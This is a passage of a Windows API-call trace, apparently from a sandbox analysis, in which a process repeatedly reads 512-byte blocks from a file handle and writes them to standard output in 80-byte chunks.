lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] GetFileType (hFile=0x50) returned 0x1 [0152.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.502] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] GetFileType 
(hFile=0x50) returned 0x1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] GetFileType (hFile=0x50) returned 0x1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] GetFileType (hFile=0x50) returned 0x1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] GetFileType (hFile=0x50) returned 0x1 [0152.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.503] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.503] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.503] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.503] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.504] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, 
lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.504] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.504] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.505] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.505] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 
[0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] GetFileType (hFile=0x50) returned 0x1 [0152.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.505] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] WriteFile (in: hFile=0x50, 
lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.506] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.506] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.506] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.506] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] GetFileType (hFile=0x50) returned 0x1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.507] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.508] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.508] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, 
lpOverlapped=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.508] GetFileType (hFile=0x50) returned 0x1 [0152.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] GetFileType (hFile=0x50) returned 0x1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] GetFileType (hFile=0x50) returned 0x1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 
| out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] GetFileType (hFile=0x50) returned 0x1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] GetFileType (hFile=0x50) returned 0x1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.509] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.509] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.509] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] GetFileType (hFile=0x50) returned 0x1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.510] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 
[0152.511] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.511] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.511] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 
[0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.511] GetFileType (hFile=0x50) returned 0x1 [0152.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.512] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.512] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, 
lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] GetFileType (hFile=0x50) returned 0x1 [0152.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.512] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] GetFileType (hFile=0x50) returned 0x1 [0152.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.513] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.513] _get_osfhandle 